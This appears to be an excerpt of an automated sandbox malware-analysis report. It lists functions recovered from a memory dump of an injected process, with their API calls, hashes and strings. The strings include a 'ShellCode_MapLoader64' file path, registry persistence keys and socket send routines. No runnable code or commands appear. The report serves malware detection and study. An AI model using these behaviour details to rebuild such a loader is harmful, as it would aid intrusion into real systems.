                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _fileno$_errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 482796045-0
                                                                            • Opcode ID: 02767f0d3d9df5bd7afa2c306bef05b01e90781a74b09d5dca5bcb138b697b5b
                                                                            • Instruction ID: 438739e6b13be5711d442315b016457286f584dad522494e3353cef6e6ceb7d8
                                                                            • Opcode Fuzzy Hash: 02767f0d3d9df5bd7afa2c306bef05b01e90781a74b09d5dca5bcb138b697b5b
                                                                            • Instruction Fuzzy Hash: 4951C322214A8486CB259F3A95E12FD3351FB43B94BA48315EB7A4B6E1CB68C5D2F700
                                                                            Function 00C0B2D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _getptd$CreateFrameInfo_amsg_exit
                                                                            • String ID: csm
                                                                            • API String ID: 2825728721-1018135373
                                                                            • Opcode ID: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                                                                            • Instruction ID: 59511cdf710ee3da737da9e588ba03240f63f1112c15a46701a2a3e3724b3585
                                                                            • Opcode Fuzzy Hash: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                                                                            • Instruction Fuzzy Hash: E441BF36200B81C2C630EF12E44036E77A4F385BA4F454225EFAD07B95DF39C5A5D701
                                                                            Function 00BF01E0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32 ref: 00BF01F8
                                                                            • LocalAlloc.KERNEL32 ref: 00BF0210
                                                                            • LocalFree.KERNEL32 ref: 00BF030B
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • lstrlenW.KERNEL32 ref: 00BF0262
                                                                            • GetFileAttributesW.KERNEL32 ref: 00BF02CA
                                                                            • SHFileOperationW.SHELL32 ref: 00BF02E3
                                                                            • CoTaskMemFree.COMBASE ref: 00BF0316
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask_errno_invalid_parameter_noinfolstrlen
                                                                            • String ID: %s\%s${206629A6-BF8E-426E-AEC4-88B3A8712196}
                                                                            • API String ID: 2444233868-3959428754
                                                                            • Opcode ID: 54602548cafb9261f4589ebb62c62188df0a7085716d7b9d5ed83343bd92bfe1
                                                                            • Instruction ID: 39176bf0c7de2f2c32944e561afeb07dd2a576f4ac76464e895b251b9f81ae14
                                                                            • Opcode Fuzzy Hash: 54602548cafb9261f4589ebb62c62188df0a7085716d7b9d5ed83343bd92bfe1
                                                                            • Instruction Fuzzy Hash: 42311E31228A5482E750AB15E85476E77B1F7C9794F501126F78B83AB8DF3CC949CB04
                                                                            Function 00BF4230 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 233synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32 ref: 00BF42CE
                                                                            • SetEvent.KERNEL32 ref: 00BF4479
                                                                            • WaitForSingleObject.KERNEL32 ref: 00BF44E1
                                                                            • CloseHandle.KERNEL32 ref: 00BF4544
                                                                            • CloseHandle.KERNEL32 ref: 00BF45D8
                                                                            • VirtualFree.KERNEL32 ref: 00BF4683
                                                                            • shutdown.WS2_32 ref: 00BF475D
                                                                            • closesocket.WS2_32 ref: 00BF4768
                                                                              • Part of subcall function 00C04C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04CCF
                                                                              • Part of subcall function 00C04740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Timer$ChangeCloseConcurrency::details::platform::__HandleQueue$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                                                                            • String ID: d
                                                                            • API String ID: 1089388041-2564639436
                                                                            • Opcode ID: 22ee97f09f4b1a6eeec20ce19dd3291ad4cb0a41c74073d43de2e5ea2f1671a4
                                                                            • Instruction ID: 3e32aae38ad927e238a75bb8b4a971bbb4ec272f9b5e17b44433ac45df09372d
                                                                            • Opcode Fuzzy Hash: 22ee97f09f4b1a6eeec20ce19dd3291ad4cb0a41c74073d43de2e5ea2f1671a4
                                                                            • Instruction Fuzzy Hash: 64C10932208E8485EB74DB44F4947BAA3A0F7D9754F510626D78E87BA8EF7CC598CB40
                                                                            Function 00C03160 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 144976343-2564639436
                                                                            • Opcode ID: b0d4b0597200e7fced3cc0175a142e2adc3c36a1462220e0a18b3d554b4c3aa4
                                                                            • Instruction ID: 57d5fb2db1e20450fb85e07e8a7cd0146fcf3ae9de1ab0ddd102072663a2d3e5
                                                                            • Opcode Fuzzy Hash: b0d4b0597200e7fced3cc0175a142e2adc3c36a1462220e0a18b3d554b4c3aa4
                                                                            • Instruction Fuzzy Hash: FA419036218B8482DB148B56F49431EB7B4F3C9B94F20511AEA9E43BA8CF7DC585CB00
                                                                            Function 00BF38E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 69memoryprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00BF38F6
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BF3917
                                                                            • LocalAlloc.KERNEL32 ref: 00BF392F
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • CreateProcessW.KERNEL32 ref: 00BF3A0E
                                                                            • LocalFree.KERNEL32 ref: 00BF3A1E
                                                                            • LocalFree.KERNEL32 ref: 00BF3A29
                                                                            • LocalFree.KERNEL32 ref: 00BF3A3B
                                                                            • LocalFree.KERNEL32 ref: 00BF3A46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem_errno_invalid_parameter_noinfolstrlen
                                                                            • String ID: h
                                                                            • API String ID: 1407737935-2439710439
                                                                            • Opcode ID: 5db3b849252307c87e8a57140bbaa53c71b171dc624f000820bd87f75d707c1e
                                                                            • Instruction ID: 88e8d609895f8f771780e15f288a94caf0461011c7222eee58d1e05bacf24a55
                                                                            • Opcode Fuzzy Hash: 5db3b849252307c87e8a57140bbaa53c71b171dc624f000820bd87f75d707c1e
                                                                            • Instruction Fuzzy Hash: EB31FA36218A8482E7609F61F4A875FB7A1F7C5B54F504225EA8947BA8DFBCC549CB00
                                                                            Function 00BE7840 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 51registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE786E
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegOpenKeyW.ADVAPI32 ref: 00BE78B3
                                                                            • lstrlenW.KERNEL32 ref: 00BE78C2
                                                                            • RegSetValueExW.ADVAPI32 ref: 00BE78F5
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE7907
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE791C
                                                                            Strings
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 00BE78E6
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 00BE787C
                                                                            • SOFTWARE\%s, xrefs: 00BE7883
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNameOpenValue_errno_invalid_parameter_noinfolstrlen
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3731830441-923683513
                                                                            • Opcode ID: bc8a62a413aab8115f21246b749b5c834cb4a6f0d706a5d7d4e36d6591e53ffc
                                                                            • Instruction ID: 9871231ef25e701310ae9f29d1f4cefee0ae1c9e9a90a8fdf0885d4111f44036
                                                                            • Opcode Fuzzy Hash: bc8a62a413aab8115f21246b749b5c834cb4a6f0d706a5d7d4e36d6591e53ffc
                                                                            • Instruction Fuzzy Hash: 1B113635329AC191EB20DB25FC94B9A73A0FBC4785F805522DA5E836A4DF7CC549C704
                                                                            Function 00C11304 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32 ref: 00C1139E
                                                                            • malloc.LIBCMT ref: 00C11407
                                                                            • MultiByteToWideChar.KERNEL32 ref: 00C1143B
                                                                            • LCMapStringW.KERNEL32 ref: 00C11462
                                                                            • LCMapStringW.KERNEL32 ref: 00C114AA
                                                                            • malloc.LIBCMT ref: 00C11507
                                                                              • Part of subcall function 00C0C678: _FF_MSGBANNER.LIBCMT ref: 00C0C6A8
                                                                              • Part of subcall function 00C0C678: HeapAlloc.KERNEL32(?,?,00000000,00C105CC,?,?,00000000,00C10ADD,?,?,?,00C10B87,?,?,00000000,00C0AB85), ref: 00C0C6CD
                                                                              • Part of subcall function 00C0C678: _callnewh.LIBCMT ref: 00C0C6E6
                                                                              • Part of subcall function 00C0C678: _errno.LIBCMT ref: 00C0C6F1
                                                                              • Part of subcall function 00C0C678: _errno.LIBCMT ref: 00C0C6FC
                                                                            • LCMapStringW.KERNEL32 ref: 00C1153C
                                                                            • WideCharToMultiByte.KERNEL32 ref: 00C1157C
                                                                            • free.LIBCMT ref: 00C11590
                                                                            • free.LIBCMT ref: 00C115A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                            • String ID:
                                                                            • API String ID: 1080698880-0
                                                                            • Opcode ID: af953abe7841ed101deebbbddd0bd4cc4f493c92dfd21aa2a52dcb46ea6e20e0
                                                                            • Instruction ID: 2a17b32b6414ab6fc9ae6cc02eabf8723f1dfc09ca151c8a7a8e41301477b0f4
                                                                            • Opcode Fuzzy Hash: af953abe7841ed101deebbbddd0bd4cc4f493c92dfd21aa2a52dcb46ea6e20e0
                                                                            • Instruction Fuzzy Hash: F971C53230478086DB258F26D4407A977A6F78ABE8F580325EF6A47B98DF3CC681D700
                                                                            Function 00BE5AD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE5AFE
                                                                            • _LDint.LIBCPMTD ref: 00BE5B15
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • CreateFileW.KERNEL32 ref: 00BE5B93
                                                                            • WriteFile.KERNEL32 ref: 00BE5BF0
                                                                            • CloseHandle.KERNEL32 ref: 00BE5C13
                                                                            • CloseHandle.KERNEL32 ref: 00BE5C28
                                                                            • DeleteFileW.KERNEL32 ref: 00BE5C36
                                                                            Strings
                                                                            • %s\ShellCode_MapLoader64, xrefs: 00BE5B42
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandle$CreateDeleteDintModuleNameWrite_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\ShellCode_MapLoader64
                                                                            • API String ID: 797432855-674329531
                                                                            • Opcode ID: 6c4c68b4993732659224326c0d985c0c1f9bd7ca997abf86513995386b1bba55
                                                                            • Instruction ID: 12d5b6a1ae70f30dd573240eb7435c5f126e8198aae6410077287a63a8f6c1d6
                                                                            • Opcode Fuzzy Hash: 6c4c68b4993732659224326c0d985c0c1f9bd7ca997abf86513995386b1bba55
                                                                            • Instruction Fuzzy Hash: 5F310B72218AC886E730DB24F89879A73A1F7C9755F904326D69983BA8DF3DC509CB04
                                                                            Function 00C00990 Relevance: 13.6, APIs: 9, Instructions: 148memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocalund_memcpy$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616075706-0
                                                                            • Opcode ID: 4273aa3ed035d45046343f4e35ff5a98ddfcc1115a4f04b1cd00d0e68ff1453c
                                                                            • Instruction ID: 9ec8a8b02b0d0e71ab68976cf9669ceca61c81d5d9f8db816121ce6e461e54c3
                                                                            • Opcode Fuzzy Hash: 4273aa3ed035d45046343f4e35ff5a98ddfcc1115a4f04b1cd00d0e68ff1453c
                                                                            • Instruction Fuzzy Hash: DD81B1767096C09ADBB0CB1AE4907EAB7A1E7C9744F508026EA8987B58DF3CD585CF40
                                                                            Function 00C0318F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 3200977696-2564639436
                                                                            • Opcode ID: a91fcc2f4d1881e81c3f2414ec21d3bfaeb39f579f5509cc7686b59caf4bfee5
                                                                            • Instruction ID: 4f7b6a6c275e3864bea4d6db44ad9655c9ed58accf910814127bada33768db1d
                                                                            • Opcode Fuzzy Hash: a91fcc2f4d1881e81c3f2414ec21d3bfaeb39f579f5509cc7686b59caf4bfee5
                                                                            • Instruction Fuzzy Hash: B431A736218B8486DB54CB56F49531AB7B4F3C9B94F205116EB9E43BA8CF7DC985CB00
                                                                            Function 00BE41D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 00BE422E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseHandleObjectOpenResetSingleWait
                                                                            • String ID: {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1560999653-1105423733
                                                                            • Opcode ID: 9f19a6a2f878386801282272d62eb7bc9277ca4ec48c3bee408db1daecd0a670
                                                                            • Instruction ID: c896b207cab09b057b416ac160d5567cf2b61493a70ef6d0ad01c9d9a583fa1e
                                                                            • Opcode Fuzzy Hash: 9f19a6a2f878386801282272d62eb7bc9277ca4ec48c3bee408db1daecd0a670
                                                                            • Instruction Fuzzy Hash: 14210B30924A80C6FE349B22F86872D73E0F7D6759F6007A6E64A42564CF3CC988DB06
                                                                            Function 00C04340 Relevance: 12.1, APIs: 8, Instructions: 99timememorynetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C043A2
                                                                            • htons.WS2_32 ref: 00C043CF
                                                                            • wsprintfA.USER32 ref: 00C04404
                                                                              • Part of subcall function 00C04620: WSACreateEvent.WS2_32 ref: 00C04638
                                                                              • Part of subcall function 00C04620: WSAEventSelect.WS2_32 ref: 00C0465F
                                                                              • Part of subcall function 00C04620: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046B4
                                                                              • Part of subcall function 00C04620: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046C3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04448
                                                                              • Part of subcall function 00C033B0: send.WS2_32 ref: 00C033DC
                                                                              • Part of subcall function 00C04500: WSACreateEvent.WS2_32 ref: 00C04518
                                                                              • Part of subcall function 00C04500: WSAEventSelect.WS2_32 ref: 00C0453F
